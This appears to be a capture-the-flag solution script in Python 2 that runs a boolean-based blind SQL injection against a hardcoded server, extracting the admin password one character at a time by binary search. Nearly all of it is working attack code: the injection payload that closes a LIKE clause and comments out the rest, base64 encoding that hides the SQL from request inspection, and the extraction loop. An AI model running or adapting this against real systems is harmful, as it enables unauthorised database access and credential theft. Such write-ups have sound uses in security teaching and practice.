Second_Fry

web - 200 - Animal attack - success

Mar 4th, 2018
  1. import base64
  2. import math
  3. import requests
  4.  
  5.  
def make_request(sqlstr):
    """POST *sqlstr* to the challenge server as the ``spy_name`` form field.

    The value is base64-encoded before sending, so the SQL text never
    appears literally in the request body. Request logging or inspection
    on the receiving side has to decode ``spy_name`` before it can match
    on the content.

    Returns the ``requests`` response object unchanged.
    """
    form_fields = {'spy_name': base64.b64encode(sqlstr)}
    return requests.post('http://128.199.224.175:24000', data=form_fields)
  8.  
def check_request(sqlstr):
    """Return True when the response to *sqlstr* contains the marker phrase.

    Only the presence or absence of one fixed phrase in the response body
    is used as the signal. Presumably the phrase is part of the page that
    is rendered when the injected condition holds; confirm against the
    application. No database error or query output is read back.
    """
    marker = 'Are commanded him convinced dashwoods did estimable'
    response = make_request(sqlstr)
    return marker in response.content
  16.  
def build_injection(index, comparison):
    """Build the boolean condition that tests one character of the password.

    The result compares the ASCII code of the character at position
    *index* of the admin password against *comparison*, an operator plus
    a number such as ``'<79'`` or ``'=76'``.

    The leading ``%'`` appears to close a quoted LIKE pattern in the
    server's own statement, and the trailing ``#`` comments out whatever
    follows; both are inferred from the payload, not from server code.
    Binding the decoded ``spy_name`` value as a query parameter instead of
    concatenating it into the statement removes this injection point.
    """
    pieces = (
        "%' and ascii(substring((select password from users where username = 'admin'),",
        str(index),
        ",1))",
        comparison,
        " limit 1#",
    )
    return ''.join(pieces)
  22.  
  23. # This is not brute force! It's actually an educated guess (binary search)
  24. # We are also playing fair and being gentle on the server
def guess(index, low, high):
    """Binary-search the ASCII code of the character at position *index*.

    The interval [low, high] is halved with ``<`` probes until the two
    bounds are adjacent, then each bound is tested with ``=``. For the
    32..127 range used by the caller that is roughly seven range probes
    plus one or two equality probes per character. Request volume
    therefore stays low; the recognisable trace on the server side is a
    run of decoded ``spy_name`` values that differ only in the position
    and the compared number.

    Raises a bare ``Exception`` when neither adjacent bound matches.
    """
    def holds(comparison):
        # One round trip: does the injected condition evaluate to true?
        return check_request(build_injection(index, comparison))

    if high - low != 1:
        middle = int(math.floor((low + high) / 2))
        if holds('<' + str(middle)):
            bounds = (low, middle)
        else:
            bounds = (middle, high)
        print '#', index, ': ', bounds[0], ' - ', bounds[1]
        return guess(index, *bounds)

    # Bounds are adjacent: settle on one of them with exact comparisons.
    for candidate in (low, high):
        if holds('=' + str(candidate)):
            return candidate
    raise Exception()
  41.  
# key = "pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}"
key = 'pctf{'

length = 40  # pctf{L31___________________________}

# The known prefix is skipped: the first position requested from guess() is
# len(key) + 1, which matches 1-based substring() positions.
first_unknown = len(key) + 1

for i in xrange(first_unknown, length):
    try:
        code = guess(i, 32, 127)
        key += chr(code)
    except Exception as e:
        # guess() found no match in 32..127 for this position (or the request
        # failed). Show what has been recovered and wait for the operator;
        # the loop then moves on without extending key.
        print key
        raw_input()

    print key

print key